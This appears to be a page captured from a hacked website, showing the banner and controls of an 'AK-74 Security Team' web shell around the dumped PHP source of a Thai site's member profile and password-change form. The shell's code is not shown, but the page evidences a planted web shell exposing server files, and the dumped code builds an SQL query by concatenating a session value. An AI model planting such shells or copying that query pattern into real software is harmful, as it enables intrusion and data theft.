.:: :[ AK-74 Security Team Web-shell ]: ::.
phpinfo()
PHP
<table width="450" border="0" cellspacing="0" cellpadding="0" style="background-color:#F7D2FF"> <form action="memberEditForm_add.php" method="post" enctype="multipart/form-data" name="form1" id="formMemberPost" onsubmit="return checkMemberEditForm()"> <tr> <td><img src="images/top-form.gif" width="450" height="11" /></td> </tr> <tr> <td valign="top"><table width="450" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="450" valign="top" style="padding-top:11px;"><table width="450" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="113" class="black" style="padding-bottom:11px; padding-right:5px;"> <strong>ชื่อผู้ใช้</strong></td> <td class="black" style="padding-bottom:11px;"><?php $sql = " SELECT username, email, enews_receive FROM member WHERE member_id = '".$_SESSION['s_member_id']."' "; $query = sql_query($sql); $rec = sql_fetch_array($query); $fieldlist = array('username','email','enews_receive'); foreach ($fieldlist as $value) { $$value = $rec["$value"]; } // end foreach echo $username; ?></td> </tr> <tr> <td class="black" style="padding-bottom:11px; padding-right:5px;"> <strong>อีเมล์</strong></td> <td class="black" style="padding-bottom:11px;"><?php echo $email?></td> </tr> <tr> <td class="black" style="padding-bottom:11px; padding-right:5px;"> <strong>รหัสผ่านปัจจุบัน</strong></td> <td style="padding-bottom:11px;"><span style="padding-bottom:5px;"> <input name="oldPassword" type="password" id="oldPassword" value="" /> </span></td> </tr> <tr> <td class="black" style="padding-bottom:11px; padding-right:5px;"> <strong>รหัสผ่านใหม่</strong></td> <td style="padding-bottom:11px;"><span style="padding-bottom:5px;"> <input name="newPassword" type="password" id="newPassword" value="" /> </span></td> </tr> <tr> <td class="black" style="padding-bottom:11px; padding-right:5px;"> <strong>ยืนยันรหัสผ่านใหม่</strong></td> <td style="padding-bottom:11px;"><input name="c_password" type="password" id="c_password" /></td> </tr> <?php if ($enews_receive <> 1) { ?> <tr> <td class="black" style="padding-bottom:11px; padding-right:5px;"> <strong>จดหมายข่าว</strong></td> <td class="black" style="padding-bottom:11px;"><input name="enews_receive" type="checkbox" id="enews_receive" value="1" /> ฉันตกลงรับข่าวสารจาก Msn Ladyboy</td> </tr> <?php } // end if ($enews_receive == 1) { ?> <tr> <td style="padding-bottom:11px; padding-right:5px;"> </td> <td style="padding-bottom:11px;"><span style="padding-bottom:11px; padding-right:5px;"><a href="/delPostMember.php" onclick="return confirm('ยืนยันการลบข้อมูลประกาศของท่าน !')">ลบข้อมูลประกาศของท่าน</a></span></td> </tr> <tr> <td> </td> <td><input name="bMemberEdit" type="submit" value=" ตกลง " id="bMemberEdit" /> <input name="bMemberCancel" type="button" value=" ยกเลิก " id="bMemberCancel" onclick="window.location='/<?php echo $configMyFileFirstPage?>'" /></td> </tr> <tr> <td colspan="2"> </td> </tr> </table></td> </tr> </table></td> </tr> <tr> <td><img src="images/bottom-form.gif" width="450" height="11" /></td> </tr> </form> </table> <?php unset($_SESSION['s_message_post']); ?>
Rename:
-